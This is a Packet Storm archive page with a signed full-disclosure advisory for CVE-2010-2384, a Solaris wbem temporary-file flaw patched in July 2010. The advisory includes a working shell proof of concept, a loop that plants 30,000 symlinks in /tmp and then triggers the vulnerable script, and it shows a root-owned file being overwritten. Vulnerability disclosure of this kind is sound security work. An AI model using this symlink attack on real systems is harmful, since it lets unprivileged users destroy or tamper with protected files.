what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Solaris wbem Unsafe Use Of Temporary Files

Solaris wbem Unsafe Use Of Temporary Files
Posted Jul 21, 2010
Authored by Frank Stuart

Solaris wbem suffers from an unsafe use of temporary files vulnerability.

tags | exploit
systems | solaris
advisories | CVE-2010-2384
SHA-256 | e25695c184c89f651bdda342eaad990a889f8c8d85453a12ab23d8db36072c2b
Download | Favorite | View

Solaris wbem Unsafe Use Of Temporary Files

Change Mirror Download
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Below is the full disclosure information for CVE-2010-2384.  It was
reported to security-alert@sun.com on 3 January, 2010 and assigned Sun
bug 6913886.

This vulnerability was addressed by Sun/Oracle in the July 2010 Critical
Patch Update
(http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujul2010.html).

- ------

When the wbem service is enabled
but hasn't been used before, it will run
/usr/sadm/lib/smc/prereg/SUNWrmui/SUNWrmui_reg.sh which can be exploited
by an unprivileged local user like this:

   $ id
   uid=101(fstuart) gid=14(sysadmin)
   $ cd /tmp
   $ x=0
   $ while [ "$x" -ne 30000 ] ;do
   > ln -s /etc/important /tmp/dummy.$x
   > x=$(expr "$x" + 1)
   > done
   $ ls -dl /etc/important
   -rw-r--r--   1 root     root          38 Jan  3 22:43 /etc/important
   $ cat /etc/important
      This is an important file!

      EOF
  $ telnet localhost 898
   Trying 127.0.0.1...
   Connected to localhost.
   Escape character is '^]'.



   ^]
   telnet> quit
   Connection to localhost closed.
   $ cat /etc/important
   /<\/Scope>/ {
   n
   i\
     <Folder TreeDisplay="false"> \
       <Name>SUNWrmui Bootstrap Folder</Name> \
       <Description>This a temporary folder to workaround a bug.  It
should be deleted during install.  But if you do see it in the toolbox
editor, do NOT delete it.</Description> \
       <Icon>status_16.gif</Icon> \
       <LargeIcon>status_32.gif</LargeIcon> \
     </Folder>
   }

SUNWrmui_reg.sh also uses /tmp/this_computer.$$ which can also be
exploited.

- ------

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.3 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/

iQEVAwUBTEUMPmKGA6cQSpZSAQJXogf+PNSJwfSchgycCWHVpqknVm4KKJ1s/m0y
SWmbzxkoTuKR3hrW7cAPbUb2RHU92Ew587/uPIXhpUCaTrYImJUU9EYHoo132ZpL
KNEXQeqzMi2qaxQU6mkQBEA9Qc3VDh0kDcbDPjPJKShqb2k84CBq6ni39vb1zRlY
SVMldGCS5XflnjtINiwzdmnjNCVkMT4wtuFo3f2GhZaNKEOAKr2LVZT1KkYA6fmY
a6E5XFisQPBbVSPhN82ed7v73GTe5o09SDN3bHozV7x2ki4vxjCFau/hGG/NVNVD
NddIRtqVu8uodrI5hyt1gNXtTV9rT40GiAyOA1iuQHM7FmB8SXKI8w==
=8592
-----END PGP SIGNATURE-----
Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Site Links
News by Month
News Tags
Files by Month
File Tags
File Directory
About Us
History & Purpose
Contact Information
Terms of Service
Privacy Statement
Copyright Information
Services
Security Services
Hosting By
Rokasec
close